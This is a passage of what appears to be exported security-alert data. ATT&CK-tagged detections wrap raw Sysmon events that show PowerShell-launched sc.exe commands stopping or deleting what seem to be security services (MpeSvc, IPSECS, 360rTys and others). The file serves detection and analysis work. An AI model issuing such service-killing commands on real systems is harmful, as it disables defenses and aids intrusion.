Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:31.937",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:03.883 +ProcessGuid: {df9fc3d3-b3f3-5ecf-0000-0010f1762e00} +ProcessId: 6008 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.005512300Z"",""eventRecordID"":""3464"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:03.883\r\nProcessGuid: {df9fc3d3-b3f3-5ecf-0000-0010f1762e00}\r\nProcessId: 6008\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:03.883"",""processGuid"":""{df9fc3d3-b3f3-5ecf-0000-0010f1762e00}"",""processId"":""6008"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:31.890",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:03.723 +ProcessGuid: {df9fc3d3-b3f3-5ecf-0000-001007742e00} +ProcessId: 6836 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:03.736872700Z"",""eventRecordID"":""3461"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:03.723\r\nProcessGuid: {df9fc3d3-b3f3-5ecf-0000-001007742e00}\r\nProcessId: 6836\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:03.723"",""processGuid"":""{df9fc3d3-b3f3-5ecf-0000-001007742e00}"",""processId"":""6836"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:31.859",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:03.652 +ProcessGuid: {df9fc3d3-b3f3-5ecf-0000-00102e722e00} +ProcessId: 4668 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:03.656221700Z"",""eventRecordID"":""3459"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:03.652\r\nProcessGuid: {df9fc3d3-b3f3-5ecf-0000-00102e722e00}\r\nProcessId: 4668\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:03.652"",""processGuid"":""{df9fc3d3-b3f3-5ecf-0000-00102e722e00}"",""processId"":""4668"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:31.844",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:03.434 +ProcessGuid: {df9fc3d3-b3f3-5ecf-0000-0010e8702e00} +ProcessId: 7592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:03.471685700Z"",""eventRecordID"":""3458"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:03.434\r\nProcessGuid: {df9fc3d3-b3f3-5ecf-0000-0010e8702e00}\r\nProcessId: 7592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:03.434"",""processGuid"":""{df9fc3d3-b3f3-5ecf-0000-0010e8702e00}"",""processId"":""7592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:30.906",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:02.443 +ProcessGuid: {df9fc3d3-b3f2-5ecf-0000-00106f6c2e00} +ProcessId: 7960 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:02.472026100Z"",""eventRecordID"":""3455"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:02.443\r\nProcessGuid: {df9fc3d3-b3f2-5ecf-0000-00106f6c2e00}\r\nProcessId: 7960\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:02.443"",""processGuid"":""{df9fc3d3-b3f2-5ecf-0000-00106f6c2e00}"",""processId"":""7960"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:30.777",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:02.325 +ProcessGuid: {df9fc3d3-b3f2-5ecf-0000-0010136a2e00} +ProcessId: 3932 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:02.330762400Z"",""eventRecordID"":""3452"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:02.325\r\nProcessGuid: {df9fc3d3-b3f2-5ecf-0000-0010136a2e00}\r\nProcessId: 3932\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:02.325"",""processGuid"":""{df9fc3d3-b3f2-5ecf-0000-0010136a2e00}"",""processId"":""3932"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.783",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:01.771 +ProcessGuid: {df9fc3d3-b3f1-5ecf-0000-00103b672e00} +ProcessId: 6328 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System 